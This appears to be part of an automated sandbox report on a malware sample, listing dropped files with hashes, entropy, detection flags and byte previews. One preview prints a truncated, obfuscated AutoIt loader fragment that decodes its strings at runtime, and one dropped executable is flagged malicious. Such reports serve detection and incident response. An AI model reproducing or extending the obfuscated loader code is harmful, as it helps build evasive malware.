                                                                                                                                                            File Type:ASCII text, with very long lines (2633), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1213985
                                                                                                                                                            Entropy (8bit):5.424802222912315
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:A96a/UwPRU7iuldXPKzUq0T1Ozd5Ux9BHtV7NdJK8crvosLhjNh4PfAv:pa/UwPRUvldXil01OAJHX/JK1LhB
                                                                                                                                                            MD5:2755A48352BA322E4FB289CC432C2882
                                                                                                                                                            SHA1:4F88077F28D532C45CFEC6A8320BCA36FCEBB773
                                                                                                                                                            SHA-256:6718CA85EE272C4251160CB301D3D5C17A78864EB8DB7100F418A72D053F7A4B
                                                                                                                                                            SHA-512:2D04052FA6582C48F17247A27E227253E4F8669421A1A1C086D4AAE267647B0402F8976C238E7390A9DBE42F15481E4714F3D34F88A9F00A5D77F096FA747737
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):284672
                                                                                                                                                            Entropy (8bit):6.7111298454087125
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:nwU0Wyw3mFygyE4mqd12lqlEAehuqN8zwNzlmhPL1b5nZ2tZ6lfA6d:nr0Wyw20K4mqClqlEZuB1b5Z2tZ6Xd
                                                                                                                                                            MD5:EAD6F8DB6759E6E9E2F4B7708A96AC92
                                                                                                                                                            SHA1:FFB1D6010A38D57F8B77C0CD0085FFA790C8AEDE
                                                                                                                                                            SHA-256:87FBFECD918F36439ED5D682B4A221E15BE4612CDD02FD7E565946650968B908
                                                                                                                                                            SHA-512:1693E94F7189097BE1EE1D42AB88402D12247E7B76BDCD842ADFD22C70A25AAEC4A82A715B82D4D8DC5BED43185CFD228D3C0E2A60CA51D787ED4F5F3425FF8B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.M.W..<.I.....M.......u._..^.U..QSVW.}............M..0.E...t...........}.....J.h....j.S..p.I.....uP..0.I...Wu5j.ht.J.S..........t!j.h..J.S.........t.VVS..p.I.....3...u..M.........M......t.V....I...u....;}...V...3._^[.....U..E.W.<...M.......L.....3.....u.3..D..t....<V.u..u......YY..t..u.P....I.....t.V.5...Y......j..'...Y..3.^_].U..Vh..J.h..J.h..J.j..w..........t..u.......I...^].^].%..I.U..Vh..J.h..J.h..J.j..<.........u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............u..u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............t..u....u..u.....I......u..u...8.I.^]...M....M.3.;.V.5..L........B.0.@.;.u.^.U..}..u'V...M..>.t..>.t..6....I..&........M.u.^]................SVW.T$..D$..L$.URPQQh.;B.d.5.......L.3.D$.d.%.....D$0.X..L$,3..p....t;.T$4...t.;.v..4v.\.....H..{..u.h.....C...........C......d........._^[.L$..A..........t3.D$..H.3..<...U.h..p..p..p..>......].D$..T$..........U.t$.........L$..).q..q..q(....
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):142944
                                                                                                                                                            Entropy (8bit):5.969459394945841
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:b6jKj+wsxjgarB3RZgDWy4ZNogXJ3i2Umb2Oq:b64EgarxUaBZ2myoG
                                                                                                                                                            MD5:6B960EF62185ED62F077876EADCC43BA
                                                                                                                                                            SHA1:43145A1CAD268EB3A9E83976220C1FEF520C9178
                                                                                                                                                            SHA-256:AFA04BC5E7565DC55796122C222B1BF313A9EACCEE9950C47A7E3B0FE1E3E81A
                                                                                                                                                            SHA-512:99F644DF6343D6C875F772C3131191BB9DBB43E7A4C8D8541CD6BAFAEA7E4BDA1C92CE598B3795779F426B055F87631331489620B6BDF454C4820A374D7A7069
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.................*.+.,.-......7.8.9.:......D.E.F.G......Q.R.S.T......^._.`.a......j.k.l.m...........................@...................`........................... ................... ...........@....................................................................... ...............................................................................................................................................\.P.{.N.d.}.....\.P.{.X.p.s.}...\.p.{.X.p.s.}.......................................................................................................................alpha.lower.upper.alnum.ascii.blank.cntrl.digit.graph.print.punct.space.word.xdigit.\.P.{.X.w.d.}...\.p.{.N.d.}.....................\.h.....\.P.{.L.}...\.p.{.L.}................MARK.ACCEPT.COMMIT.F.FAIL.PRUNE.SKIP.THEN..\.P.{.L.l.}...............................M.....=.%...N.+...f.5...\.;.....C.....L...].S.....[.....d.....j.....l.........B.....g................._.....C.........................................>...........
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):112640
                                                                                                                                                            Entropy (8bit):6.611164856526023
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Ufza6iyY5tVGvH7fsUQwHJJX4xF5jtHk5B+LNBI:Ufm608DsvqJX4xNAB+g
                                                                                                                                                            MD5:34BF8C86E3DBF86DCB7757C149E9F093
                                                                                                                                                            SHA1:073875E0FF5BF3F02E4A7364771D285D4278B099
                                                                                                                                                            SHA-256:B6D1D4992A081AC54315204C8F8E0A269582D0C8D58A05ECAE9A1FBEC9427358
                                                                                                                                                            SHA-512:A3F157D609E776E3A2D9F5D50CFA699B89508F58ABA0775428C941067881FAC3E74FD8BF54D66368E8A83D841FC6184D9B682568496CD471ABDE45C44DFFC30A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.v.....j.Xf.E...S.Nq..Y..E.P..p.I....v......._^..[....U..Vj...q.....E.Yf.8.u..H....H...t...Q.P....&...^]...U..E.SVW.X.S..`.I........;.~...AQ..p..Y...O.3.PPQVj.SPP....I._..^[]...U..QQVj..p...U...j..E.P.J..M..J.V.M.........^....U..VWj..hp..Y..W..l.I..u.VW....I...y..f...f...._^]...U..E.SVW.X.S..`.I.......;.~...3.@j.Z.........Q..p....Y..t.SW....I.3.f..w.._^[]...U..S.].V.u.W.}.S...W.E.....I...xWf...tLf.}..j.Yr.f...w......f;.t2f;.u.j..w......Vj.WW..D.I.j...Xf9.u.j..w........x.3.@..3._^[]...U..SVW.}.j....[f;.......j.ZjHYj.^f;.v.f;.vnf;.ti.]..u.SV..8.I...ypf...uj.{.V.....E...M...p.I.j.Xf;.t#j.Yf;.v.j.Yf;.v.jHYf;.t..E.f...G..%f...E.PW.......u.V..p.I.W.u.f...W....F._^[]...U...(S.] VW.}.f.?$..O....E.P..l.I..G..U.3.RV.u.u..VP.Q(.u.u..................G..U.3.WR..WWP.Q,.........}...@...E...E f..t/.u.j....X..f..R..p.I...f....f...E .@..D.......@.3.A+....E.E .@..E.3..E..........N.j..M..M.^.}......R....E ..p.I.....M....f.4......E.9E.u..u.!..E PQ.}..........E ...E..}..M.f.4P........
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):142336
                                                                                                                                                            Entropy (8bit):6.406248037321785
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:pPpU08BjlWTPJth26X7Sn4UfpLUNN9t68cCWlrss4M5i9:LQBk7JjX74cN0lrzt4
                                                                                                                                                            MD5:FD88002B2C4106D99DB3171C2F55B007
                                                                                                                                                            SHA1:9E4FDC1C725805000ECDA278E02AE39B7C04E12E
                                                                                                                                                            SHA-256:64E46C6062D2165105A22E023A92BD2F20C3751A6CE3CEE6053FBB33C9E05D40
                                                                                                                                                            SHA-512:CBB8A2110FBDA84322D92FB15D6473333AD4DF43B780A0E76443509755291121893DF1A6F2B67E3C80AECBB6F5B6586B217CE8EEC5EDD3F4B92FEAD9298376FC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1212711
                                                                                                                                                            Entropy (8bit):7.912999126781567
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:UAl76qnq2ZULeYTnZXHQJZW6xcZLPLaDWmcGiVPxccmvrJ4428ng:N9hx/gZIeZLPMWbGQsvq/H
                                                                                                                                                            MD5:956D074F7C6BD174C43586F07892E820
                                                                                                                                                            SHA1:45A9273A96E66B3B05D2B53540C1B4DC6C5E2A05
                                                                                                                                                            SHA-256:BDF72E1C0964B7A7B96651B278B6F8D4B42849C01FF2AA6C6844B5AC2A893F3B
                                                                                                                                                            SHA-512:ABB7C98BE2A86A543D353D0ED812FD87A0303BCC858F39A19DE7A3F20829C071BCDC3AFA99D9F82C0C8C9B3C8674D4C9CE2B73A43E0A760CA9BA1A659664BFE3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                            Preview:MZ`.....................@...............................................!..L.!Require Windows..$....[a..[a..[a..R.~.Ya..R.o.\a..R.y.Ma..R.i.Ja..[a..a..4.d.Ya..4.P._a..4.Q.ja..4.`.Za..4.g.Za..Rich[a..................PE..L......`.................z...........{............@..........................p............@.................................T...........Q@..........?Y...'...P..8....................................................................................text....x.......z.................. ..`.rdata..j5.......6...~..............@..@.data....+..........................@....rsrc...Q@.......B..................@..@.reloc..`....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6222
                                                                                                                                                            Entropy (8bit):3.706691070399353
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:agJ3dCteoXkvhkvCCtOMflTQHlMflT5HW:5J3Qe4OMfUMfK
                                                                                                                                                            MD5:86DAE1157BEEECDCF715D1B4ED36FB7E
                                                                                                                                                            SHA1:A031FD596C06EFDC0FD876A4B1D4727B963DCE83
                                                                                                                                                            SHA-256:8003DA480BE2F7A62AE3602B09F8724F7BC108BFFD4AEE75B64EF38B10EDA5E3
                                                                                                                                                            SHA-512:264E07A3DF34F465BD339E80C0AFC2A79E4D15E0F937F90815B5C2C4699F1D00CD948FA9501A02D5F23B772F3F31C0BB91B8DBBF29B9CC753C97C14667099128
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...................................FL..................F.".. ...d.........Nd..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........Nd.....Nd......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlTX......B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....TX....Roaming.@......DWSlTX......C......................Jo.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlTX......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E.....................W]..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlTX......q...........
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6222
                                                                                                                                                            Entropy (8bit):3.706691070399353
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:agJ3dCteoXkvhkvCCtOMflTQHlMflT5HW:5J3Qe4OMfUMfK
                                                                                                                                                            MD5:86DAE1157BEEECDCF715D1B4ED36FB7E
                                                                                                                                                            SHA1:A031FD596C06EFDC0FD876A4B1D4727B963DCE83
                                                                                                                                                            SHA-256:8003DA480BE2F7A62AE3602B09F8724F7BC108BFFD4AEE75B64EF38B10EDA5E3
                                                                                                                                                            SHA-512:264E07A3DF34F465BD339E80C0AFC2A79E4D15E0F937F90815B5C2C4699F1D00CD948FA9501A02D5F23B772F3F31C0BB91B8DBBF29B9CC753C97C14667099128
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...................................FL..................F.".. ...d.........Nd..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........Nd.....Nd......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlTX......B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....TX....Roaming.@......DWSlTX......C......................Jo.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlTX......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E.....................W]..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlTX......q...........
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 20 21:46:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2677
                                                                                                                                                            Entropy (8bit):3.9794018243128138
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8rdsTQA1HridAKZdA19ehwiZUklqehSy+3:8enT1y
                                                                                                                                                            MD5:EB95927EE4F08657E4C51CD5CE61AB03
                                                                                                                                                            SHA1:C2E6FFDC68C4B8C4D663CB6424DF80CB194CE178
                                                                                                                                                            SHA-256:7D8367DB5E0B670ACBB235E7C71B7C8E057F62930A80EFFFEBE3C9B967131583
                                                                                                                                                            SHA-512:A6098F0D8E3BA13FB009F5515F9A134D509A54BEAF4E8697992347F4D835756C9A89BD8807AAC2AB0530400C97DB496540FB7BC55964B8109F670499D7A340D9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.@.. ...$+.,....l..Nd..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ITX.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VTX.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VTX.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VTX............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VTX............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............qP.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 20 21:46:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2679
                                                                                                                                                            Entropy (8bit):3.9937667275360456
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8EdsTQA1HridAKZdA1weh/iZUkAQkqehly+2:8Pnh9Q0y
                                                                                                                                                            MD5:46141018CE712145D2B91D5A7BDA6A3F
                                                                                                                                                            SHA1:D73FA9DE33F822133254C3A98AC84845F5E47D6C
                                                                                                                                                            SHA-256:15935608FA7C7C694B27724C0183BFFE7D79D8E23A86E5EA89D7A9892236B998
                                                                                                                                                            SHA-512:E34C982054EEC32F71ABA6B471AB59FF10991C0246DBA04D27E69C755448D8C25B9EDFA6897AB87AC9C93558C67AF600D62847F395E84F1E3E942B8848CC7B08
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....O..Nd..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ITX.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VTX.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VTX.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VTX............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VTX............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............qP.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2693
                                                                                                                                                            Entropy (8bit):4.005336330687547
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8xJdsTQAsHridAKZdA14tseh7sFiZUkmgqeh7svy+BX:8xInGnhy
                                                                                                                                                            MD5:3841CE43CA9F8DEFD4E451C1002F750F
                                                                                                                                                            SHA1:A61E7FDF950CA427DBF7CFCFBFC95B78091A6A6F
                                                                                                                                                            SHA-256:9756F71F15511376D73063F3F8BC6ADA8DF614B9E0CE0FE69D23350F1BA51935
                                                                                                                                                            SHA-512:2C2629074E9AE7EFFC1FDE19CADDB79F142023C5BD44FFA37B937AB403B4D067936659180937BF89869B9001A895331491629A55DCA5179AF003F1B30C8EB3B4
                                                                                                                                                            Malicious:false
